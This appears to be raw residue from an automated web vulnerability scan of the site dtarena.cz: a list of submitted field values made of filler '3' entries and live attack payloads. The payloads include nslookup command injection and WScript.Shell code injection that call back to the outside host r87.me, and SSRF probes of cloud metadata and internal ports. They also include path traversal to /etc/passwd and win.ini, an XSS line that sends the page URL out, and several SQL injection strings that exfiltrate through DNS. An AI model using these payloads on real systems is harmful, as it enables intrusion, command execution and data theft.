3 |
3 |
|nslookup${IFS}"gx3icql8knvv7sahyl0ew0sqlc_g-oggxil-5n0a""xv0.r87.me" |
"&nslookup "gx3icql8knmxsb4k6cw9ituyzsy6mjhbcathfijz""d5o.r87.me" |
&nslookup "gx3icql8kntsgrdxyzrv6d2htbw8d-swzvhc8xff""eho.r87.me" |
nslookup "gx3icql8kni3bwklmtbguiowogcikikfb76bxkrq""om4.r87.me" |
"+createobject("WScript.Shell").exec("nslookup gx3icql8knotu1bjayxkwrtdx7p8et5ftwpc6y3b" & "zwq.r87.me").StdOut.ReadAll+" |
<%createobject("WScript.Shell").exec("nslookup gx3icql8knx-ttuziwri5lnj1ngj9mszyta3q5xg" & "tzm.r87.me").StdOut.ReadAll%> |
+createobject("WScript.Shell").exec("nslookup gx3icql8knim1qnup6lsjok3gmeknwstjstfo02d" & "myq.r87.me").StdOut.ReadAll+ |
+createobject("WScript.Shell").exec("nslookup gx3icql8knjyprdgdqvef2j6ujmxaaelobit4ice" & "oei.r87.me").StdOut.ReadAll |
createobject("WScript.Shell").exec("nslookup gx3icql8knmccruvneqswqlcatc_6uckj2m8tuph" & "hvs.r87.me").StdOut.ReadAll |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
http://dtarena.cz/server-status |
3 |
3 |
http://::1:3306 |
3 |
3 |
3 |
3 |
3 |
http://46.28.105.79:3306 |
3 |
3 |
3 |
http://127.0.0.1:3306 |
3 |
3 |
3 |
http://::1:22 |
http://46.28.105.79:22 |
3 |
http://127.0.0.1:22 |
3 |
http://169.254.169.254/latest/meta-data/public-hostname |
http://aws.r87.me/latest/meta-data/public-hostname |
3 |
127.0.0.1/elmah |
3 |
::1/elmah |
127.100.11.2/elmah |
46.28.105.79/elmah |
dtarena.cz/elmah |
http://dtarena.cz/elmah |
3 |
3 |
127.0.0.1/elmah.axd |
3 |
3 |
3 |
::1/elmah.axd |
127.100.11.2/elmah.axd |
index.php |
46.28.105.79/elmah.axd |
index.php |
dtarena.cz/elmah.axd |
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
http://dtarena.cz/elmah.axd |
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
127.0.0.1/trace.axd |
/etc/passwd |
::1/trace.axd |
3/../../../../../../../../../../../etc/passwd |
127.100.11.2/trace.axd |
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd |
46.28.105.79/trace.axd |
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd |
dtarena.cz/trace.axd |
....//....//....//....//....//....//....//....//....//....//....//etc/passwd |
http://dtarena.cz/trace.axd |
3 |
...//...//...//...//...//...//...//...//...//...//...//etc/passwd |
/../../../../../../../../../../../etc/passwd .php |
/../../../../../../../../../../../etc/passwd |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
/../../../../../../../../../../../etc/passwd |
/../../../../../../../../../../proc/version .php |
3 |
gx3icql8kngu9pm8mrbm88pbop2oqeibsdjkxkhxm2n.r87.me/p/ |
/../../../../../../../../../../proc/version |
3 |
/../../../../../../../../../../var/log/apache/error.log |
3 |
/../../../../../../../../../../var/log/apache2/error.log |
3 |
/../../../../../../../../../../etc/httpd/logs/error_log |
3 |
/../../../../../../../../../../etc/httpd/logs/error.log |
";l=document.createElement("link");l.rel="prefetch";l.href="//gx3icql8kn922uxzsdnsoxvx5axx2hnmmk4kpml_"+"wjw.r87.me/r/?"+location.href;document.head.appendChild(l);// |
3 |
/../../../../../../../../../../proc/self/fd/2 .php |
|
3 |
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(103)||chr(120)||chr(51)||chr(105)||chr(99)||chr(113)||chr(108)||chr(56)||chr(107)||chr(110)||chr(48)||chr(99)||chr(111)||chr(112)||chr(103)||chr(106)||chr(109)||chr(51)||chr(105)||chr(111)||chr(106)||chr(100)||chr(120)||chr(56)||chr(57)||chr(49)||chr(101)||chr(108)||chr(45)||chr(119)||chr(118)||chr(98)||chr(107)||chr(116)||chr(54)||chr(121)||chr(55)||chr(118)||chr(111)||chr(53)||chr(99)||chr(57)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)))) |
/../../../../../../../../../../proc/self/fd/2 |
(select UTL_INADDR.GET_HOST_ADDRESS(chr(103)||chr(120)||chr(51)||chr(105)||chr(99)||chr(113)||chr(108)||chr(56)||chr(107)||chr(110)||chr(122)||chr(50)||chr(98)||chr(119)||chr(118)||chr(97)||chr(116)||chr(57)||chr(116)||chr(116)||chr(119)||chr(57)||chr(105)||chr(48)||chr(49)||chr(111)||chr(117)||chr(109)||chr(54)||chr(121)||chr(110)||chr(103)||chr(110)||chr(106)||chr(99)||chr(119)||chr(97)||chr(112)||chr(103)||chr(97)||chr(48)||chr(121)||chr(111)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL) |
|
3 |
/../../../../../../../../../../windows/iis6.log |
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(103)||chr(120)||chr(51)||chr(105)||chr(99)||chr(113)||chr(108)||chr(56)||chr(107)||chr(110)||chr(45)||chr(111)||chr(121)||chr(107)||chr(117)||chr(120)||chr(109)||chr(119)||chr(99)||chr(102)||chr(55)||chr(112)||chr(113)||chr(117)||chr(101)||chr(120)||chr(106)||chr(113)||chr(57)||chr(113)||chr(100)||chr(107)||chr(51)||chr(95)||chr(103)||chr(97)||chr(113)||chr(98)||chr(120)||chr(114)||chr(103)||chr(48)||chr(56)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric) |
 |
3 |
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini |
3 |
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini |
3 |
3 |
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini |
3 |
3 |
http://gx3icql8knd5lgllrzprntwklxg-chrfnddj3mwww97.r87.me/p/ |
3 |
3 |
3 |
3 |
3 |
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
c:windowswin.ini |
3 |
/../../../../../../../../../../windows/win.ini .php |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
file:/windows/win.ini |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
/../../../../../../../../../../windows/win.ini |
3 |
3 |
3 |
3 |
3 |
/../../../../../../../../../../web.config |
3 |
3 |
c%3a%5cboot.ini |
3 |
3 |
3 |
file%3a%2fboot.ini |
n3tsp4rke2 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
3 |
3 |
3 |
3 |
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) |
"& SET /A 0xFFF9999-2 & |
3 |
3 |
3 |
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
3 |
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) |
3 |
3 |
3 |
3 |
3 |
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
3 |
3 |
3 |
%27 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |
3 |